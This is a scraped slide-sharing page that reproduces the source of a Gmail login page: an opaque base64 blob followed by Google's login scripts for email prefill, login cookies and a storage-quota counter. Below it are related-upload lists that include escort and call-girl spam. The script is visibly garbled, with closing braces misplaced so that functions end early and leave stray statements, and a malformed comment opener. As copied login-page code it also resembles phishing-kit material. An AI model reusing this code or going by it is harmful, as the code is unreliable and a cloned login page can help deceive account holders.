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
M2yVzc/
+d4o90iCbov7duWDYLR30BaAgQNlSslLZN59oficvsSThmObBFz+J6B8qe/Kq2MsLEujjhjEPY+XfLKv
b34nwg2cPnwnK9LIF01SRxfEry4caFd2TZzOyWG3zFQwgfiMVrjCnkZ/Pyou1SoS9/y+cIBaBW24JVKd
MNSCds9EWRDp5z82163SuzJbvP5THvwSshqKXxFjYekP7mZWJ+0iEx79NSTikONykQvQLHWOc9VWJtR3
ebk76abfmnrhg89x0F9lkApgs7CtfgXkKDD51pQe8JBvCsA9KTf0ekpIhvpfI5CgQvpt3daewGK1iaem
Xbb9FVLoAIF9ptVbIRVOYlqdBAIho1Y2QcUO6xHWWRG/rInQunsRSlY3JrbYqxcOUeBqYtg9SJssFXZ0
BPKE46FMk4V+0RnwFZqpp0EehudxvuDvgcjSYcjubBVMHCb/js8UFYGmDul+lMPUuuEXedZY5HZU3R9v
LVMgHnALZp7DZNtR4eIUSkPCAFF1JBkb/OwGcJlJtRnbN2buxhtdIkISn+0XcF8b5yuoh0yC+EF7FyNz
quQqJ/LofxNJjbOgFx6taZ9HjQFDYXOX3YCbOMGnbDLBNKX6aExIKlW+02ZYVkhM2CY6HA7RkUQW4Wct
zJkruZy6KRov0/sF8Q0UIdNZKpmUTf6qIuAEf2XeZy5nfvXEKxcInsX8SBNR2S/6/KBnso0l69WshOcQ
w3UGJUShNFd84FYcaCJdqJjl1VgDU+bx6p9zzawuPw/Bxs57FA4cW3reWU/Fkt2GL9EeP5K8Gx9km40d
hqPS4qHRVAxoGDVPW0XNl+SLSz0y6xdFw05i8l94aWrjQxc=');
</script>
<script>
function gaia_parseFragment() {
var hash = location.hash;
var params = {};
if (!hash) {
return params;
}
var paramStrs = decodeURIComponent(hash.substring(1)).split('&');
for (var i = 0; i < paramStrs.length; i++) {
var param = paramStrs[i].split('=');
params[param[0]] = param[1];
}
return params;
}
function gaia_prefillEmail() {
var form = null;
if (document.getElementById) {
form = document.getElementById('gaia_loginform');
}

}

if (form && form.Email &&
(form.Email.value == null || form.Email.value == '')
&& (form.Email.type != 'hidden')) {
hashParams = gaia_parseFragment();
if (hashParams['Email'] && hashParams['Email'] != '') {
form.Email.value = hashParams['Email'];
}
}

try {
gaia_prefillEmail();
} catch (e) {
}
</script>
<script>
function gaia_setFocus() {
var form = null;
var isFocusableField = function(inputElement) {
if (!inputElement) {
return false;
}
if (inputElement.type != 'hidden' && inputElement.focus &&
inputElement.style.display != 'none') {
return true;
}
return false;
};
var isFocusableErrorField = function(inputElement) {
if (!inputElement) {
return false;
}
var hasError = inputElement.className.indexOf('form-error') > -1;
if (hasError && isFocusableField(inputElement)) {
return true;
}
return false;
};
var isFocusableEmptyField = function(inputElement) {
if (!inputElement) {
return false;
}
var isEmpty = inputElement.value == null || inputElement.value == '';
if (isEmpty && isFocusableField(inputElement)) {
return true;
}
return false;
};
if (document.getElementById) {
form = document.getElementById('gaia_loginform');
}
if (form) {
var userAgent = navigator.userAgent.toLowerCase();
var formFields = form.getElementsByTagName('input');
for (var i = 0; i < formFields.length; i++) {
var currentField = formFields[i];
if (isFocusableErrorField(currentField)) {
currentField.focus();
var currentValue = currentField.value;
currentField.value = '';
currentField.value = currentValue;
return;
}

}

for (var j = 0; j < formFields.length; j++) {
var currentField = formFields[j];
if (isFocusableEmptyField(currentField)) {
currentField.focus();
return;
}
}
}
}
if (!('ontouchstart' in window)) {
gaia_attachEvent(window, 'load', gaia_setFocus);
}
</script>
<script>
var gaia_scrollToElement = function(element) {
var calculateOffsetHeight = function(element) {
var curtop = 0;
if (element.offsetParent) {
while (element) {
curtop += element.offsetTop;
element = element.offsetParent;
}
}
return curtop;
}
var siginOffsetHeight = calculateOffsetHeight(element);
var scrollHeight = siginOffsetHeight - window.innerHeight +
element.clientHeight + 0.02 * window.innerHeight;
window.scroll(0, scrollHeight);
}
</script>
<script>
(function(){
var signinInput = document.getElementById('signIn');
gaia_onLoginSubmit = function() {
try {
document.bg.invoke(function(response) {
document.getElementById('bgresponse').value = response;
});
} catch (err) {
document.getElementById('bgresponse').value = '';
}
return true;
}
document.getElementById('gaia_loginform').onsubmit = gaia_onLoginSubmit;
var signinButton = document.getElementById('signIn');
gaia_attachEvent(window, 'load', function(){
gaia_scrollToElement(signinButton);
});
})();
</script>
<script type="text/javascript">
var BrowserSupport_={IsBrowserSupported:function(){var
agt=navigator.userAgent.toLowerCase();var is_op=agt.indexOf("opera")!=-1;var
is_ie=agt.indexOf("msie")!=-1&&document.all&&!is_op;var is_ie5=agt.indexOf("msie
5")!=-1&&document.all&&!is_op;var is_mac=agt.indexOf("mac")!=-1;var
is_gk=agt.indexOf("gecko")!=-1;var is_sf=agt.indexOf("safari")!=-1;if(is_ie&&!
is_op&&!is_mac){if(agt.indexOf("palmsource")!=
-1||agt.indexOf("regking")!=-1||agt.indexOf("windows ce")!=-1||
agt.indexOf("j2me")!=-1||agt.indexOf("avantgo")!=-1||agt.indexOf(" stb")!=1)return false;var v=BrowserSupport_.GetFollowingFloat(agt,"msie ");if(v!
=null)return v>=5.5}if(is_gk&&!is_sf){var
v=BrowserSupport_.GetFollowingFloat(agt,"rv:");if(v!=null)return
v>=1.4;else{v=BrowserSupport_.GetFollowingFloat(agt,"galeon/");if(v!=null)return
v>=
1.3}}if(is_sf){if(agt.indexOf("rv:3.14.15.92.65")!=-1)return false;var
v=BrowserSupport_.GetFollowingFloat(agt,"applewebkit/");if(v!=null)return
v>=312}if(is_op){if(agt.indexOf("sony/com1")!=-1)return false;var
v=BrowserSupport_.GetFollowingFloat(agt,"opera
");if(v==null)v=BrowserSupport_.GetFollowingFloat(agt,"opera/");if(v!
=null)return v>=8}if(agt.indexOf("pda; sony/com2")!=-1)return true;return
false},
GetFollowingFloat:function(str,pfx){var i=str.indexOf(pfx);if(i!=-1){var
v=parseFloat(str.substring(i+pfx.length));if(!isNaN(v))return v}return
null}};var is_browser_supported=BrowserSupport_.IsBrowserSupported()
</script>
<script type=text/javascript>
<!-var start_time = (new Date()).getTime();
if (top.location != self.location) {
top.location = self.location.href;
}
function SetGmailCookie(name, value) {
document.cookie = name + "=" + value + ";path=/;domain=.google.com";
}
function lg() {
var now = (new Date()).getTime();

}

var cookie = "T" + start_time + "/" + start_time + "/" + now;
SetGmailCookie("GMAIL_LOGIN", cookie);

function StripParam(url, param) {
var start = url.indexOf(param);
if (start == -1) return url;
var end = start + param.length;
var charBefore = url.charAt(start-1);
if (charBefore != '?' && charBefore != '&') return url;
var charAfter = (url.length >= end+1) ? url.charAt(end) : '';
if (charAfter != '' && charAfter != '&' && charAfter != '#') return url;
if (charBefore == '&') {
--start;
} else if (charAfter == '&') {
++end;
}
return url.substring(0, start) + url.substring(end);
}
var fixed = 0;
function FixForm() {
if (is_browser_supported) {
var form = el("gaia_loginform");
if (form && form["continue"]) {
var url = form["continue"].value;
url = StripParam(url, "ui=html");
url = StripParam(url, "zy=l");
form["continue"].value = url;
}
}
fixed = 1;
}
function el(id) {
if (document.getElementById) {
return document.getElementById(id);
} else if (window[id]) {
return window[id];
}
return null;
}
// Estimates of nanite storage generation over time.
var CP = [
[ 1224486000000, 7254 ],
[ 1335290400000, 7704 ],
[ 1335376800000, 10240 ],
[ 2144908800000, 13531 ],
[ 2147328000000, 43008 ],
[ 46893711600000, Number.MAX_VALUE ]
];
var quota_elem;
var ONE_PX = "https://mail.google.com/mail/images/c.gif?t=" +
(new Date()).getTime();
function LogRoundtripTime() {
var img = new Image();
var start = (new Date()).getTime();
img.onload = GetRoundtripTimeFunction(start);
img.src = ONE_PX;
}
function GetRoundtripTimeFunction(start) {
return function() {
var end = (new Date()).getTime();
SetGmailCookie("GMAIL_RTT", (end - start));
}
}
function MaybePingUser() {
var f = el("gaia_loginform");
if (f.Email.value) {
new Image().src = 'https://mail.google.com/mail?gxlu=' +
encodeURIComponent(f.Email.value) +
'&zx=' + (new Date().getTime());
}
}
function OnLoad() {
MaybePingUser();
var passwd_elem = el("Passwd");
if (passwd_elem) {
passwd_elem.onfocus = MaybePingUser;
}
LogRoundtripTime();
if (!quota_elem) {
quota_elem = el("quota");
updateQuota();
}
LoadConversionScript();

}
function updateQuota() {
if (!quota_elem) {
return;
}
var now = (new Date()).getTime();
var i;
for (i = 0; i < CP.length; i++) {
if (now < CP[i][0]) {
break;
}
}
if (i == 0) {
setTimeout(updateQuota, 1000);
} else if (i == CP.length) {
quota_elem.innerHTML = CP[i - 1][1];
} else {
var ts = CP[i - 1][0];
var bs = CP[i - 1][1];
quota_elem.innerHTML = format(((now-ts) / (CP[i][0]-ts) * (CP[i][1]-bs)) +
bs);
setTimeout(updateQuota, 1000);
}
}
var PAD = '.000000';
function format(num) {
var str = String(num);
var dot = str.indexOf('.');
if (dot < 0) {
return str + PAD;
} if (PAD.length > (str.length - dot)) {
return str + PAD.substring(str.length - dot);
} else {
return str.substring(0, dot + PAD.length);
}
}
var google_conversion_type = 'landing';
var google_conversion_id = 1069902127;
var google_conversion_language = "en_US";
var google_conversion_format = "1";
var google_conversion_color = "FFFFFF";
function LoadConversionScript() {
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "https://www.googleadservices.com/pagead/conversion.js";
}
// -->
</script>
<script>
gaia_attachEvent(window, 'load', function() {
OnLoad();
FixForm();
});
(function() {
var gaiaLoginForm = document.getElementById('gaia_loginform');
var gaia_onsubmitHandler = gaiaLoginForm.onsubmit;
gaiaLoginForm.onsubmit = function() {
lg();
if (!fixed) {
FixForm();
}
gaia_onsubmitHandler();
};
})();
</script>
</body>
</html>

Weitere ähnliche Inhalte

Was ist angesagt?

HTML5 and CSS3: Exploring Mobile Possibilities - London Ajax Mobile Event
HTML5 and CSS3: Exploring Mobile Possibilities - London Ajax Mobile EventHTML5 and CSS3: Exploring Mobile Possibilities - London Ajax Mobile Event
HTML5 and CSS3: Exploring Mobile Possibilities - London Ajax Mobile EventRobert Nyman
 
Theme futura suicida não use como base e nem copie
Theme futura suicida não use como base e nem copieTheme futura suicida não use como base e nem copie
Theme futura suicida não use como base e nem copieRafaela Souza
 
Source Code Halaman Web Radio Stremaing [RAMEN RADIO]
Source Code Halaman Web Radio Stremaing [RAMEN RADIO]Source Code Halaman Web Radio Stremaing [RAMEN RADIO]
Source Code Halaman Web Radio Stremaing [RAMEN RADIO]Rizki Ogawa
 
Bloggdesign #2 - hawaa.blogg.no
Bloggdesign #2 - hawaa.blogg.noBloggdesign #2 - hawaa.blogg.no
Bloggdesign #2 - hawaa.blogg.noHannee92
 
Earn money with banner and text ads for Clickbank
Earn money with banner and text ads for ClickbankEarn money with banner and text ads for Clickbank
Earn money with banner and text ads for ClickbankJaroslaw Istok
 
Earn money with banner and text ads for clickbank
Earn money with banner and text ads for clickbankEarn money with banner and text ads for clickbank
Earn money with banner and text ads for clickbankJaroslaw Istok
 
LessCSS Presentation @ April 2015 GTALUG Meeting
LessCSS Presentation @ April 2015 GTALUG MeetingLessCSS Presentation @ April 2015 GTALUG Meeting
LessCSS Presentation @ April 2015 GTALUG MeetingMyles Braithwaite
 
Blog skins396734
Blog skins396734Blog skins396734
Blog skins396734pantangmrny
 
Componentization css angular
Componentization css angularComponentization css angular
Componentization css angularDavid Amend
 
HTML5 Boilerplate - PV219
HTML5 Boilerplate - PV219HTML5 Boilerplate - PV219
HTML5 Boilerplate - PV219GrezCZ
 
Making Links Magical Again with CSS
Making Links Magical Again with CSSMaking Links Magical Again with CSS
Making Links Magical Again with CSSJenn Lukas
 

Was ist angesagt? (18)

HTML5 and CSS3: Exploring Mobile Possibilities - London Ajax Mobile Event
HTML5 and CSS3: Exploring Mobile Possibilities - London Ajax Mobile EventHTML5 and CSS3: Exploring Mobile Possibilities - London Ajax Mobile Event
HTML5 and CSS3: Exploring Mobile Possibilities - London Ajax Mobile Event
 
Resume
ResumeResume
Resume
 
Theme futura suicida não use como base e nem copie
Theme futura suicida não use como base e nem copieTheme futura suicida não use como base e nem copie
Theme futura suicida não use como base e nem copie
 
Source Code Halaman Web Radio Stremaing [RAMEN RADIO]
Source Code Halaman Web Radio Stremaing [RAMEN RADIO]Source Code Halaman Web Radio Stremaing [RAMEN RADIO]
Source Code Halaman Web Radio Stremaing [RAMEN RADIO]
 
Bloggdesign #2 - hawaa.blogg.no
Bloggdesign #2 - hawaa.blogg.noBloggdesign #2 - hawaa.blogg.no
Bloggdesign #2 - hawaa.blogg.no
 
Earn money with banner and text ads for Clickbank
Earn money with banner and text ads for ClickbankEarn money with banner and text ads for Clickbank
Earn money with banner and text ads for Clickbank
 
Everest
EverestEverest
Everest
 
Earn money with banner and text ads for clickbank
Earn money with banner and text ads for clickbankEarn money with banner and text ads for clickbank
Earn money with banner and text ads for clickbank
 
Documento
DocumentoDocumento
Documento
 
LessCSS Presentation @ April 2015 GTALUG Meeting
LessCSS Presentation @ April 2015 GTALUG MeetingLessCSS Presentation @ April 2015 GTALUG Meeting
LessCSS Presentation @ April 2015 GTALUG Meeting
 
Blog skins396734
Blog skins396734Blog skins396734
Blog skins396734
 
Document
DocumentDocument
Document
 
CSS3 ...in 3D!
CSS3 ...in 3D!CSS3 ...in 3D!
CSS3 ...in 3D!
 
Componentization css angular
Componentization css angularComponentization css angular
Componentization css angular
 
HTML5 Boilerplate - PV219
HTML5 Boilerplate - PV219HTML5 Boilerplate - PV219
HTML5 Boilerplate - PV219
 
Tukulam
TukulamTukulam
Tukulam
 
Wsomdp
WsomdpWsomdp
Wsomdp
 
Making Links Magical Again with CSS
Making Links Magical Again with CSSMaking Links Magical Again with CSS
Making Links Magical Again with CSS
 

Ähnlich wie Gmail 15GB Email

My discussion Student A A8 - Cross-Site Request Forgery (CSR.docx
My discussion Student A A8 - Cross-Site Request Forgery (CSR.docxMy discussion Student A A8 - Cross-Site Request Forgery (CSR.docx
My discussion Student A A8 - Cross-Site Request Forgery (CSR.docxgilpinleeanna
 
HTML5 and CSS3 Refresher
HTML5 and CSS3 RefresherHTML5 and CSS3 Refresher
HTML5 and CSS3 RefresherIvano Malavolta
 
Week ThreeExpress Holidayscssstyle.csshtml{ height 100.docx
Week ThreeExpress Holidayscssstyle.csshtml{ height 100.docxWeek ThreeExpress Holidayscssstyle.csshtml{ height 100.docx
Week ThreeExpress Holidayscssstyle.csshtml{ height 100.docxphilipnelson29183
 
Simple Blue Blog Template XML 的副本
Simple Blue Blog Template XML 的副本Simple Blue Blog Template XML 的副本
Simple Blue Blog Template XML 的副本a5494535
 
HTML5 and CSS3 – exploring mobile possibilities - Frontend Conference Zürich
HTML5 and CSS3 – exploring mobile possibilities - Frontend Conference ZürichHTML5 and CSS3 – exploring mobile possibilities - Frontend Conference Zürich
HTML5 and CSS3 – exploring mobile possibilities - Frontend Conference ZürichRobert Nyman
 
Css code for a awoko newspaper html website which provides busines.pdf
Css code for a awoko newspaper html website which provides busines.pdfCss code for a awoko newspaper html website which provides busines.pdf
Css code for a awoko newspaper html website which provides busines.pdfaroraenterprisesmbd
 
cssstyle.cssbody { font-family Montserrat, Arial, sa
cssstyle.cssbody {    font-family Montserrat, Arial, sacssstyle.cssbody {    font-family Montserrat, Arial, sa
cssstyle.cssbody { font-family Montserrat, Arial, saMargenePurnell14
 

Ähnlich wie Gmail 15GB Email (20)

My discussion Student A A8 - Cross-Site Request Forgery (CSR.docx
My discussion Student A A8 - Cross-Site Request Forgery (CSR.docxMy discussion Student A A8 - Cross-Site Request Forgery (CSR.docx
My discussion Student A A8 - Cross-Site Request Forgery (CSR.docx
 
Resume
ResumeResume
Resume
 
Resume
ResumeResume
Resume
 
popular posts widget
popular posts widgetpopular posts widget
popular posts widget
 
HELLO WORLD 2.pptx
HELLO WORLD 2.pptxHELLO WORLD 2.pptx
HELLO WORLD 2.pptx
 
HTML5 and CSS3 Refresher
HTML5 and CSS3 RefresherHTML5 and CSS3 Refresher
HTML5 and CSS3 Refresher
 
Dynamic progress bar
Dynamic progress barDynamic progress bar
Dynamic progress bar
 
Week ThreeExpress Holidayscssstyle.csshtml{ height 100.docx
Week ThreeExpress Holidayscssstyle.csshtml{ height 100.docxWeek ThreeExpress Holidayscssstyle.csshtml{ height 100.docx
Week ThreeExpress Holidayscssstyle.csshtml{ height 100.docx
 
Simple Blue Blog Template XML 的副本
Simple Blue Blog Template XML 的副本Simple Blue Blog Template XML 的副本
Simple Blue Blog Template XML 的副本
 
HTML5 and CSS3 – exploring mobile possibilities - Frontend Conference Zürich
HTML5 and CSS3 – exploring mobile possibilities - Frontend Conference ZürichHTML5 and CSS3 – exploring mobile possibilities - Frontend Conference Zürich
HTML5 and CSS3 – exploring mobile possibilities - Frontend Conference Zürich
 
Css code for a awoko newspaper html website which provides busines.pdf
Css code for a awoko newspaper html website which provides busines.pdfCss code for a awoko newspaper html website which provides busines.pdf
Css code for a awoko newspaper html website which provides busines.pdf
 
Zebra
ZebraZebra
Zebra
 
Theme04
Theme04Theme04
Theme04
 
Css 2
Css 2Css 2
Css 2
 
Css
CssCss
Css
 
Theme03
Theme03Theme03
Theme03
 
Theme02
Theme02Theme02
Theme02
 
cssstyle.cssbody { font-family Montserrat, Arial, sa
cssstyle.cssbody {    font-family Montserrat, Arial, sacssstyle.cssbody {    font-family Montserrat, Arial, sa
cssstyle.cssbody { font-family Montserrat, Arial, sa
 
Css 3
Css 3Css 3
Css 3
 
Theme01
Theme01Theme01
Theme01
 

Kürzlich hochgeladen

Vip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile Girls
Vip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile GirlsVip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile Girls
Vip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile Girlsshivangimorya083
 
Delhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
FULL ENJOY - 9953040155 Call Girls in Sector 61 | Noida
FULL ENJOY - 9953040155 Call Girls in Sector 61 | NoidaFULL ENJOY - 9953040155 Call Girls in Sector 61 | Noida
FULL ENJOY - 9953040155 Call Girls in Sector 61 | NoidaMalviyaNagarCallGirl
 
How To Fix Mercedes Benz Anti-Theft Protection Activation Issue
How To Fix Mercedes Benz Anti-Theft Protection Activation IssueHow To Fix Mercedes Benz Anti-Theft Protection Activation Issue
How To Fix Mercedes Benz Anti-Theft Protection Activation IssueTerry Sayther Automotive
 
The 10th anniversary, Hyundai World Rally Team's amazing journey
The 10th anniversary, Hyundai World Rally Team's amazing journeyThe 10th anniversary, Hyundai World Rally Team's amazing journey
The 10th anniversary, Hyundai World Rally Team's amazing journeyHyundai Motor Group
 
新南威尔士大学毕业证(UNSW毕业证)成绩单原版一比一
新南威尔士大学毕业证(UNSW毕业证)成绩单原版一比一新南威尔士大学毕业证(UNSW毕业证)成绩单原版一比一
新南威尔士大学毕业证(UNSW毕业证)成绩单原版一比一nsrmw5ykn
 
Call me @ 9892124323 Call Girl in Andheri East With Free Home Delivery
Call me @ 9892124323 Call Girl in Andheri East With Free Home DeliveryCall me @ 9892124323 Call Girl in Andheri East With Free Home Delivery
Call me @ 9892124323 Call Girl in Andheri East With Free Home DeliveryPooja Nehwal
 
Delhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
